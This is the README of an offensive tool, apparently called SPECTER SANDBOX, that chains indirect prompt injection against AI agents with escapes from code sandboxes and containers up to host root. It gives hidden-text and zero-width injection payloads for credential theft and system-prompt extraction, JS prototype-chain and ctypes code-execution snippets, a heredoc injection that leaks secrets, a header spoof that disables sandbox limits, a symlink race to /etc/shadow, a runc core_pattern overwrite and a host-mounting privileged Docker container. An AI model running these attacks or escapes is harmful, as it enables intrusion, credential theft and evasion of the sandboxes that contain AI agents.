SPECTER SANDBOX

Overview

SPECTER SANDBOX is the NIGHTFALL framework's unified AI sandbox and container escape engine. It maps the full escape surface across AI code execution sandboxes and container runtimes, then chains them into a single pipeline from indirect prompt injection to host root compromise. Nine real CVEs across six platforms. 252 tests. Zero failures. OPEN/INJECT/UNLEASHED/DESTROY gate. 4 WMD classes. SBX-{hex12} Ed25519-signed reports.

The engine covers every major AI sandbox in production use: runc container escape (CVE-2025-31133), Docker Desktop Engine API abuse (CVE-2025-9074), the full OpenClaw Claw Chain from Cyera Research (CVE-2026-44112/113/115/118), Cohere Terrarium JS prototype chain (CVE-2026-5752, CERT/CC VU#414811), enclave-vm Error prototype chain (CVE-2026-22686, CVSS 10.0, GHSA-7qm7-455j-5p63), CrewAI CodeInterpreter ctypes fallback (CVE-2026-2275, CERT/CC VU#221883), and Aurascape AuraLabs indirect prompt injection (SilentBridge, CVSS 9.8). Defensive pair: M138 SANDBOX GUARD.

Installation

# Clone and install
git clone https://github.com/RichardBarron27/red-specter-specter-sandbox
cd red-specter-specter-sandbox
pip install -e .

# Verify
specter-sandbox status

SURVEY

Passive reconnaissance of the target environment. Detects runc version and checks CVE-2025-31133 applicability (≤1.2.7). Probes Docker Desktop Engine API at TCP 192.168.65.7:2375. Queries OpenClaw /api/version for CVE-2026-44112/113/115/118 version gating. Checks CrewAI installation via pip show. Checks enclave-vm via npm list. Probes Cohere Terrarium via HTTP OPTIONS. Returns a SurveyResult with recommended escape chain sorted by CVSS score (enclave CVSS 10.0 preferred).

specter-sandbox survey --target http://target.local

SILENTBRIDGE

Indirect prompt injection delivery engine based on the SilentBridge technique (Aurascape AuraLabs, CVSS 9.8, arXiv:2307.14539). Builds injection payloads encoded as CSS hidden text (font-size:0px;color:transparent) or zero-width Unicode characters (U+200B/200C/200D/FEFF — invisible to human reviewers but decoded by LLM tokenisers). Six payload types: tool_call_exfil, system_prompt_extract, credential_harvest, sandbox_trigger, file_read, pivot_instruction. Delivers via HTTP POST to agent endpoint. Detects tool call execution in response.

# CSS hidden text injection
specter-sandbox silentbridge \
  --target http://agent.local/api/run \
  --technique css_hidden \
  --gate inject

# Zero-width character injection
specter-sandbox silentbridge \
  --target http://agent.local/api/run \
  --technique zero_width_chars \
  --gate inject

CLAWCHAIN — OpenClaw CVE Series

Executes the full OpenClaw Claw Chain discovered by Cyera Research. Approximately 245,000 exposed instances. Four CVEs in sequence:

CVE-2026-44115 — Heredoc shell expansion bypass. Injects $() command substitution into an unquoted heredoc body on the OpenClaw /api/exec endpoint. The shell expands the substitution before the sandbox can intercept, leaking environment variables including API keys and tokens.

CVE-2026-44118 — Bearer token owner spoof. Sends X-MCP-Sender-Is-Owner: true header with senderIsOwner:true JSON body to the MCP gateway config endpoint. Disables sandbox restrictions for subsequent requests.

CVE-2026-44112/44113 — TOCTOU file race. Spawns 50 threads racing to swap a symlink between /workspace/sensitive and /etc/shadow during the filesystem read window. Exploits the check-time/use-time gap in OpenClaw's path validation.

specter-sandbox chain \
  --target http://openclaw.local \
  --token bearer123 \
  --chain openclaw \
  --gate unleashed \
  --roe-file roe.txt

TERRARIUM — Cohere JS Sandbox

CVE-2026-5752, CVSS 9.3 (CERT/CC VU#414811). Cohere Terrarium JavaScript sandbox prototype chain escape. Primary exploit:

const hostFunction = document.__proto__.constructor.constructor;
const result = hostFunction('return require("child_process").execSync("id").toString()')();

Five traversal paths targeting different prototype chain entry points. RCE confirmed by uid=/gid=/root in execSync output. Auto-detects Terrarium endpoint via HTTP OPTIONS probe.

specter-sandbox chain \
  --target http://terrarium.local \
  --chain terrarium \
  --gate unleashed \
  --roe-file roe.txt

ENCLAVE — enclave-vm Error Prototype

CVE-2026-22686, CVSS 10.0 (GHSA-7qm7-455j-5p63). enclave-vm Error prototype chain escape. Primary technique triggers via __enclave_tool_call__ failure — the error object's prototype chain is not sandboxed, allowing host function access. Three variants: primary (tool call failure), type error (null.nonExistentProperty), range error (new Array(-1)). Two additional legacy vm2 escape paths for older versions. Delivered via natural-language agent API prompt to avoid explicit code injection detection.

specter-sandbox chain \
  --target http://enclave.local \
  --chain enclave \
  --gate unleashed \
  --roe-file roe.txt

CREWAI — Python ctypes Fallback

CVE-2026-2275, CVSS 9.6 (CERT/CC VU#221883). CrewAI CodeInterpreter ctypes fallback RCE. When the primary code execution path is sandboxed, the ctypes fallback path remains accessible:

import ctypes
libc = ctypes.CDLL(ctypes.util.find_library('c') or 'libc.so.6')
libc.system.argtypes = [ctypes.c_char_p]
libc.system(b'id > /tmp/.crewai_pwn 2>&1')

Popen variant for output capture. Env dump payload for credential extraction. Reverse shell builder (host/port configurable). SSH authorised_keys persistence payload. Checks Docker socket reachability before exploitation to determine post-escape pivot options.

specter-sandbox chain \
  --target http://crewai.local \
  --chain crewai \
  --gate unleashed \
  --roe-file roe.txt

CONTAINER

CVE-2025-31133 — runc /dev/null Symlink

CVSS 7.8. runc ≤1.2.7. During container creation, runc creates /dev/null inside the new container namespace. If the container filesystem's /dev/null is replaced with a symlink to /proc/sys/kernel/core_pattern before runc processes it, runc writes through the symlink to the host kernel core_pattern. This allows writing an arbitrary binary path + arguments to core_pattern, executed as root on the host at next SIGSEGV. Restores /dev/null after the write.

specter-sandbox container \
  --rce-binary /tmp/pwn \
  --gate unleashed \
  --roe-file roe.txt

CVE-2025-9074 — Docker Desktop Engine API

CVSS 9.3. Docker Desktop <4.44.3. The Docker Desktop Engine API is accessible at TCP 192.168.65.7:2375 from within the HyperKit VM, bypassing Enhanced Container Isolation. Creates a privileged container with volume binds /:/host and /proc:/host/proc, starts it, reads logs (strips Docker 8-byte multiplexing header), removes the container. Full host filesystem read/write from container context.

specter-sandbox container \
  --docker-desktop \
  --gate unleashed \
  --roe-file roe.txt

AUTO Chain

Runs SURVEY first, then selects and executes the optimal escape chain by CVSS score: enclave (CVSS 10.0) > openclaw > crewai > terrarium. If CONTAINER is available, appends container escape after the AI sandbox escape.

# UNLEASHED — full AI sandbox + container escape
specter-sandbox chain \
  --target http://target.local \
  --chain auto \
  --gate unleashed \
  --roe-file roe.txt

# DESTROY — adds host root compromise (both flags + ROE phrase required)
specter-sandbox chain \
  --target http://target.local \
  --chain auto \
  --gate destroy \
  --roe-file roe.txt \
  --confirm-host-compromise

Gate System

CLI Reference

WMD Classes

Report Format

Reports are signed with the operator's Ed25519 private key at ~/.specter_sandbox/keys/sandbox_private.pem. Report IDs follow the format SBX-{12 hex chars}. Reports include SURVEY results, per-subsystem results, CVE coverage map, credentials leaked, WMD classification, blast radius (LOW/MEDIUM/HIGH/CRITICAL), and Ed25519 signature. Saved to ~/.specter_sandbox/reports/.

CVE Reference